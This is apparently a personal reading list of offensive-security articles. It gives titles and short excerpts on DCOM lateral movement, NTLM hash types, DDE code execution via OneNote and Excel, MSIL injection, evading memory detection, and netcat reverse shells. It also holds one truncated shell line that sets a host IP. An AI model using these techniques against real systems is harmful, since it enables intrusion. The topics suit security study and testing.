Last update Mar 17, 2018.
Stuff that I'm reading (or saving for later)
Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement
Background Last Wednesday, I had some down time so I decided to hunt around in \System32 to see if I could find anything of potential interest.
LM, NTLM, Net-NTLMv2, oh my!
When attacking AD, passwords are stored and sent in different ways, depending on both where you find it and the age of the domain. Most of these hashes are confusingly named, and both the hash name and the authentication protocol is named almost the same thing.
The ultimate goal in the target selection stage is to compile a list of high-value individuals who have information or access that the APT28 group is interested in.
Many analysts and automated solutions take advantage of various memory detections to find injected DLLs in memory. Memory detections look at the properties (and content) of processes, threads, and memory to find indicators of malicious activity in the current process.
Reviving DDE: Using OneNote and Excel for Code Execution
TL;DR: You can achieve DDE execution with Excel SpreadSheets embedded within OneNote. This bypasses the original Excel mitigation ruleset (Microsoft has released a patch to properly mitigate this) as well as the Protected View sandbox ?
Antonio 's4tan' Parata - .NET Instrumentation via MSIL bytecode injection (2018-01-11)
Title : .NET Instrumentation via MSIL bytecode injection Author : Antonio 's4tan' Parata Date : January 11, 2018 |=-----------------------------------------------------------------------=| |=--------=[ .
New lateral movement techniques abuse DCOM technology
Network attacks often contain a lateral movement stage when adversaries move through the target’s network to find the data or asset that they’re ultimately after.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin HOST=191.101.180.
This is start of a series I'm calling Autored. My goal is to quickly stand up temporary systems I commonly use during an engagement. Other efforts in this area have been documented, but they are more complex and time consuming to manage.
Upgrading shells to fully interactive TTYs
Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id.